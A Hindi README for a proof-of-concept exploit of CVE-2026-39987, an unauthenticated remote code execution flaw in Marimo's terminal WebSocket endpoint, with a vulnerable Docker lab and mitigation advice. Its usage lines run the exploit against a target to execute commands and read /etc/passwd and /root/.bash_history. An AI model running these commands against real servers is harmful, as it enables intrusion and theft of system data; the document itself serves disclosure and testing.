
CVE-2026-39987
Marimo में WebSocket टर्मिनल के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन
CVE-2026-39987 Marimo संस्करण 0.23.0 से पहले के संस्करणों को प्रभावित करने वाली एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन (Pre-Auth RCE) कमजोरी है। /terminal/ws WebSocket एंडपॉइंट प्रमाणीकरण को पूरी तरह से बायपास करता है, जिससे कोई भी अप्रमाणित हमलावर Marimo प्रक्रिया के विशेषाधिकारों (विशेषकर Docker वातावरण में रूट) के साथ एक पूर्ण इंटरएक्टिव PTY शेल प्राप्त कर सकता है।
marimo < 0.23.0marimo >= 0.23.0/terminal/wshttp:// → ws:// और https:// → wss:// रूपांतरणCVE-2026-39987/
├── CVE-2026-39987-poc.py ← मुख्य एक्सप्लॉइट
├── docker-vulnerable/
│ ├── Dockerfile
│ └── docker-compose.yml
├── notebooks/ ← स्थायी नोटबुक्स (वैकल्पिक)
├── README.md
└── LICENSE
pip install websocket-client
# मूल उपयोग
python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && hostname"
# सिस्टम एनुमरेशन
python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami && cat /etc/os-release && ls -la /app"
# संवेदनशील फ़ाइलें पढ़ें
python3 CVE-2026-39987-poc.py http://target:2718 "cat /etc/passwd && cat /root/.bash_history"
cd docker-vulnerable
docker compose up --build -d
फिर परीक्षण करें:
python3 CVE-2026-39987-poc.py http://localhost:2718 "id && whoami"
marimo >= 0.23.0 पर अपग्रेड करें/terminal/ws तक पहुँच प्रतिबंधित करेंयह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। लेखक इस उपकरण के दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। किसी भी सिस्टम का परीक्षण करने से पहले सुनिश्चित करें कि आपके पास स्पष्ट अनुमति है।
नैतिक रूप से और जिम्मेदारी से उपयोग करें।
सुरक्षा अनुसंधान और जिम्मेदार प्रकटीकरण के लिए बनाया गया।